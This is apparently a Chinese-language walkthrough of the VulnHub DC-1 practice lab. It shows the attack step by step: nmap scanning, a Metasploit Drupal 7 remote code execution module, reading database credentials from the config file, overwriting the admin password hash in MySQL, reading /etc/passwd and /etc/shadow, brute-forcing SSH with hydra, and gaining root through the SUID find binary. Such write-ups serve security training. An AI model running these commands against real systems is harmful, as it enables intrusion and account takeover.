VulnHub_DC-1渗透流程

DC-1

DC-1 是一个专门建造的易受攻击的实验室，目的是在渗透测试领域获得经验。

它旨在为初学者提供挑战，但它的难易程度取决于您的技能和知识，以及您的学习能力。

要成功完成此挑战，您将需要 Linux 技能、熟悉 Linux 命令行以及使用基本渗透测试工具的经验，例如可以在 Kali Linux 或 Parrot Security OS 上找到的工具。

获得 root 的方法有多种，我提供了一些flag，其中包含为初学者提供的线索。

总共有五个标志，但最终目的是在 root 的主目录中找到并读取标志。您甚至不需要成为 root 用户即可执行此操作，但是，您将需要 root 用户权限。

根据您的技能水平，您可以跳过查找这些标志中的大部分并直接获取 root 权限。

初学者可能会遇到他们以前从未遇到过的挑战，但谷歌搜索应该足以获得完成这一挑战所需的信息。

信息收集

nmap 192.168.157.0/24	//扫描网段
nmap -sV 192.168.157.142	//扫描版本详情

Drupal 7.x漏洞拿flag1

开放了80端口，那先访问网站

检测到是由使用PHP语言编写的开源内容管理系统Drupal搭建的，并且由Wappalyzer得知版本为7.X，所以直接使用searchsploit命令在漏洞库中搜索此版本是否有漏洞可以利用

searchsploit Drupal 7.X

有一个PHP远程代码执行的漏洞，直接用msf打

msfconsole
search Drupal 7.X
use 0
show options	//查看参数设置
set RHOSTS 192.168.157.142
run

shell
#由于得到的不是一个完整的shell环境，所以我们所以pyhton中的pty模块反弹一个完整的shell环境
python -c 'import pty;pty.spawn("/bin/bash")'

得到flag1.txt

搜寻配置文件拿flag2

根据flag1的提示，去看CMS的config配置文件，Drupal7的配置文件为 sites/default/settings.php

cat sites/default/settings.php

得到flag2以及数据库信息

flag2提示爆破和目录扫描并不是唯一获得后台的方法(并且你需要访问权限)，下面这些认证信息你如何使用)

修改密码进网站拿flag3

连接数据库

mysql -udbuser -pR0ck3t

show databases;
use drupaldb;
show tables;
select * from users;

查看数据表 (这里的test是我测试时注册的)

密码是加盐的，一般情况下难以破解，这里选择改密码的方式

首先生成自定密码的加盐哈希值。回到网站的目录下执行php scripts/password-hash.sh 密码命令生成

php scripts/password-hash.sh passwd

重新进入数据库修改密码，确认修改成功

update users set pass="$S$DgOmdbqyyWW6Du5QgThyTT1YoMlC5Pm.piv5Aprc9pejK74CobpC" where name='admin';

admin用户登录成功

在Dashboard得到flag3

查看目录拿flag4

passwd 与 shadow 是 /etc 下的目录

cat /etc/passwd
cat /etc/shadow

/etc/shadow无法查看，权限不够，在etc/passwd下发现目标靶机用户flag4

扩展思考

如何没有查看权限的话应该如何得到flag4

解决方法：

有/bin/bash ，考虑ssh连接

这里用 hydra 爆破flag4用户的密码

hydra -l flag4 -P /usr/share/john/password.lst 192.168.157.142 ssh -vV -f

-l: 登录的用户名,这里是flag4

/usr/share/john/password.lst: 要使用的密码字典文件路径

192.168.157.142: 目标主机IP

ssh: 要破解的服务,这里是ssh服务

-vV: 详细输出,显示详细的连接和破解过程

-f: 当找到可登录的密码后快速结束

提权拿flag5

查看是否具有root权限的命令

find / -perm -4000 2>/dev/null

发现find具有root权限

find -exec /bin/sh \;

提权成功，寻找flag文件

find / -name '*flag*.*'

得到flag5

简单总结

考察点较全面，思路顺畅，很有趣的一次体验，五个flag很有成就感